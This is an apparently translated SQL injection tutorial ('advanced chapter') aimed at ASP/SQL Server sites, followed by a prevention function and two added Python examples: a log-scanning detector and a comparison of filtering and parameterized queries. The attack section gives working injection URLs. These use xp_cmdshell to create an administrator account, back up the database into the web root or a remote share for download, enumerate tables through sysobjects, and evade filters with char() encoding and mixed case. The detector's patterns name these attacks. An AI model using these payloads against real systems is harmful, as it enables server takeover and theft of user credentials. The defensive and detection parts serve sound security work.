The SQL Injection Bible: A Complete Look at ASP Injection Vulnerabilities (3)

Source: Internet
Author: User
Tags: filter, IIS, numeric, net command, SQL injection, SQL Server injection, table name
Advanced Chapter

After reading the introductory and intermediate chapters and practising a little, cracking an ordinary website is no problem. But what if the table and column names cannot be guessed, or the program's author filters some special characters? How do you raise the success rate of an injection, and how do you make the guessing more efficient? Keep reading the advanced chapter.

Section 1: Using system tables to inject a SQL Server database

SQL Server is a powerful database system that is also tightly coupled to the operating system. This is very convenient for developers, but on the other hand it also gives an injector a springboard. Let us first look at a few concrete examples:

① http://site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon (;) separates two statements, and -- marks everything after it as a comment, so SQL Server executes this as two statements: first the SELECT of the record with id=1, then the stored procedure xp_cmdshell. That stored procedure runs operating-system commands, so the net command creates a Windows account with user name name and password password. Then:

② http://site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--

This adds the new account name to the Administrators group; in under two minutes you hold the highest privileges on the system. Of course, this method only works when the application connects to the database as sa; otherwise there is no permission to call xp_cmdshell.

③ http://site/url.asp?id=1 and db_name()>0

A similar example appeared earlier, and user>0, which obtains the name of the connecting user; db_name() is another system variable (a built-in function, in SQL Server terms) and returns the name of the connected database.

④ http://site/url.asp?id=1;backup database <database name> to disk='c:\inetpub\wwwroot\1.db';--

This is a rather vicious trick: take the database name obtained in ③, add the absolute path exposed by some IIS error message, back the database up into the web directory, and then download the whole database over HTTP. Every administrator and user password is laid bare! When the absolute path is unknown, it is also possible to back up to a network address (such as \\202.96.xx.xx\Share\1.db), but the success rate is not high.

⑤ http://site/url.asp?id=1 and (select top 1 name from sysobjects where xtype='U' and status>0)>0

As mentioned before, sysobjects is a SQL Server system table that stores all table names, views, constraints and other objects; xtype='U' and status>0 selects the tables created by users. The statement above takes the first table name and compares it with 0, so that the error message exposes the table name. How do you get the second and third table names? That is left for our clever readers to think about.

⑥ http://site/url.asp?id=1 and (select top 1 col_name(object_id('table name'),1) from sysobjects)>0

Once you have a table name from ⑤, object_id('table name') returns the table's internal ID, and col_name(table ID, 1) is the name of the table's first column. Replace the 1 with 2, 3, 4 ... to obtain the column names of the table being guessed one by one.

These six points are the fruit of more than half a year of my studying SQL Server injection. As you can see, how well you understand SQL Server directly determines both the success rate and the speed of guessing. After studying SQL Server injection my development skills improved greatly too; perhaps security and development really are complementary.

Section 2: Bypassing program restrictions to keep injecting

As the introductory chapter mentioned, many people like to test for injection with the ' character, so many others use the method of filtering ' to "prevent" injection. This may stop some beginners' attacks, but someone more familiar with SQL injection can still use the relevant functions to get around the program's restrictions.

In the section "General steps of SQL injection" the statements I used were optimised so that they contain no single quotes; in "Using system tables to inject a SQL Server database" some statements do contain the ' character, so let us take an example and see how such statements can be rewritten:

A simple case is where xtype='U': the character U has ASCII code 85, so it can be replaced with where xtype=char(85). If the characters are Chinese, for example where name='用户' (the Chinese word for "user"), it can be replaced with where name=nchar(29992)+nchar(25143).

Section 3: Accumulated experience

1. Some people filter the keywords Select, Update and Delete but forget to handle case, so try a spelling such as selecT.

2. When you cannot guess a column name, look at the site's login form; for convenience, column names are usually given the same names as the form's input boxes.

3. Special note: a + in the address bar is interpreted as a space once it reaches the program, %2B is interpreted as +, and %25 as %. See the documentation on URL encoding for details.

4. When injecting with the GET method, IIS records your entire submitted string, but it does not record POST bodies; so wherever a URL can be used with POST, avoid GET.

5. When guessing against Access you can only use the ASCII character-by-character decoding method. SQL Server can be guessed the same way (you only need to account for the differences between the two), but if SQL Server's error messages can be made to expose the value, efficiency and accuracy improve greatly.
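Point 4 above notes that IIS writes every GET query string to its log, and point 3 explains how + and %XX sequences are decoded. A defender can use both facts: decode the logged query and look for the Section 1 and Section 2 indicators (stacked exec of xp_cmdshell, reads of sysobjects, BACKUP DATABASE ... TO DISK, the db_name()>0 / user>0 error probes, and char()/nchar() quote evasion). The following is an added example, not code from the article; the IIS W3C log lines are constructed for the demonstration and only reuse request strings that already appear above.

```python
# Added example (not from the article): scan constructed IIS W3C log lines for the
# SQL Server injection indicators the article describes, after URL-decoding the
# cs-uri-query field the way the application itself would see it.
import re
from urllib.parse import unquote_plus

# Indicators drawn from Section 1 (stacked xp_cmdshell, sysobjects, backup to disk,
# error-based probes) and Section 2 (char()/nchar() instead of quoted strings).
INDICATORS = {
    "stacked_xp_cmdshell": re.compile(r";\s*exec\s+master\.\.xp_cmdshell", re.I),
    "sysobjects_probe":    re.compile(r"\bfrom\s+sysobjects\b", re.I),
    "backup_to_disk":      re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b", re.I),
    "error_based_probe":   re.compile(r"\b(db_name\(\)|user)\s*>\s*0", re.I),
    "char_quote_evasion":  re.compile(r"\bn?char\s*\(\s*\d+\s*\)", re.I),
}

# Constructed log lines in the W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2004-03-01 10:00:01 10.0.0.5 GET /url.asp id=1 200
2004-03-01 10:00:02 10.0.0.5 GET /url.asp id=1;exec+master..xp_cmdshell+%22net+user+name+password+/add%22-- 500
2004-03-01 10:00:03 10.0.0.5 GET /url.asp id=1+and+(select+top+1+name+from+sysobjects+where+xtype%3Dchar(85)+and+status%3E0)%3E0 500
2004-03-01 10:00:04 10.0.0.7 GET /url.asp id=1+and+db_name()%3E0 500
2004-03-01 10:00:05 10.0.0.9 GET /url.asp id=42 200
"""


def parse_w3c_line(line):
    """Split one W3C log line into fields. The query string is decoded with
    unquote_plus so that '+' becomes a space and %XX escapes are resolved,
    exactly the transformation Section 3, point 3 describes."""
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, client_ip, method, uri_stem, uri_query, status = parts[:7]
    return {
        "timestamp": f"{date} {time}",
        "client_ip": client_ip,
        "method": method,
        "uri_stem": uri_stem,
        "query": unquote_plus(uri_query),
        "status": int(status),
    }


def classify(query):
    """Return the names of every indicator that matches the decoded query string."""
    return [name for name, rx in INDICATORS.items() if rx.search(query)]


def scan_log(text):
    """Return (timestamp, client_ip, matched indicators) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        matched = classify(rec["query"])
        if matched:
            hits.append((rec["timestamp"], rec["client_ip"], matched))
    return hits


if __name__ == "__main__":
    for ts, ip, matched in scan_log(SAMPLE_LOG):
        print(ts, ip, ", ".join(matched))
```

Matching on the decoded string rather than the raw log field is the point: the raw field contains `%3E0` and `+and+`, so a pattern written for `>0` or `and` would miss it. Because POST bodies are not logged, this only covers GET requests; the same classify() can be applied to a web-application firewall's request capture or to database-side query logging for the POST case.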

Prevention methods

SQL injection vulnerabilities are a case of "a thousand-mile dike breached by an ant hole": they are extremely common on the web, usually because the programmer does not understand injection, the program's filtering is not strict enough, or one parameter is simply forgotten and never checked. Here I give you a function to use in place of ASP's Request function, with which you can say NO to all SQL injection. The function is as follows:

Function SafeRequest(ParaName, ParaType)
    '--- Incoming parameters ---
    ' ParaName: parameter name (string)
    ' ParaType: parameter type (numeric: 1 means the parameter is a number, 0 means it is a string)

    Dim ParaValue
    ParaValue = Request(ParaName)
    If ParaType = 1 Then
        ' Numeric parameter: refuse anything that is not a number
        If Not IsNumeric(ParaValue) Then
            Response.Write "Parameter " & ParaName & " must be a numeric type!"
            Response.End
        End If
    Else
        ' String parameter: double every single quote so it cannot close a string literal
        ParaValue = Replace(ParaValue, "'", "''")
    End If
    SafeRequest = ParaValue
End Function

This is the end of the article. Whether you are a security professional, a technology enthusiast or a programmer, I hope it has been of help to you.
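To make the three approaches on this page concrete side by side (the case-sensitive keyword filter that Section 3, point 1 says is easy to slip past; the SafeRequest function above, which validates numerics and doubles quotes in strings; and the parameterized query that SafeRequest approximates), here is an added example that is not part of the article. It is a Python port, not the author's ASP code: it assumes an in-memory SQLite database with constructed rows in place of SQL Server, raises ValueError where SafeRequest calls Response.End, and uses a digits-only check that is stricter than VBScript's IsNumeric.

```python
# Added example (not from the article): the article's SafeRequest ported to Python,
# shown beside the keyword blocklist it warns about and a parameterized query.
# SQLite stands in for SQL Server; the users table and its rows are constructed.
import re
import sqlite3


def keyword_blocklist(value):
    """The case-sensitive filter of Section 3, point 1: strips 'Select', 'Update',
    'Delete' exactly as spelled, so a mixed-case 'selecT' passes through untouched."""
    for kw in ("Select", "Update", "Delete"):
        value = value.replace(kw, "")
    return value


def safe_request(params, name, para_type):
    """Port of SafeRequest: para_type 1 = numeric, 0 = string.
    Numeric values must be an optionally signed run of digits (stricter than
    VBScript IsNumeric); string values get every single quote doubled."""
    value = params.get(name, "")
    if para_type == 1:
        if not re.fullmatch(r"-?\d+", value):
            raise ValueError(f"Parameter {name} must be a numeric type!")
        return value
    return value.replace("'", "''")


def query_by_concatenation(conn, raw_id):
    """The vulnerable pattern: the request value is pasted into the SQL text,
    so any condition appended to it is executed as SQL."""
    sql = "SELECT name FROM users WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def query_parameterized(conn, raw_id):
    """The fix SafeRequest approximates: convert the type, then bind the value.
    int() rejects non-numeric text and the driver never parses the value as SQL."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE id=?", (int(raw_id),))]


def query_by_name(conn, raw_name):
    """String lookup with a bound parameter: an apostrophe in the value is just data."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE name=?", (raw_name,))]


def make_db():
    """Constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "alice"), (3, "o'brien")])
    return conn


def demo():
    """Run each approach against the same inputs and return the observations."""
    conn = make_db()
    results = {}
    # 1. Concatenation: the boolean probe from the series' "general steps" is
    #    executed as part of the WHERE clause, so the row for id 1 disappears.
    results["concat_probe"] = query_by_concatenation(conn, "1 and 1=2")
    # 2. SafeRequest in numeric mode refuses the same value before it reaches SQL.
    try:
        safe_request({"id": "1 and 1=2"}, "id", 1)
        results["safe_request_numeric"] = "accepted"
    except ValueError as e:
        results["safe_request_numeric"] = str(e)
    # 3. Parameterized lookup with a genuine id.
    results["param_ok"] = query_parameterized(conn, "1")
    # 4. The case-sensitive keyword filter leaves mixed case alone.
    results["blocklist_mixed_case"] = keyword_blocklist("selecT name")
    # 5. String mode doubles the quote; the bound parameter needs no escaping at all.
    results["safe_request_string"] = safe_request({"q": "o'brien"}, "q", 0)
    results["param_string"] = query_by_name(conn, "o'brien")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The SafeRequest approach works only if every parameter goes through it with the correct ParaType, which is exactly the "one parameter forgotten" failure the prevention section describes; the bound-parameter versions have no such per-call decision, because the value never becomes SQL text in the first place.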
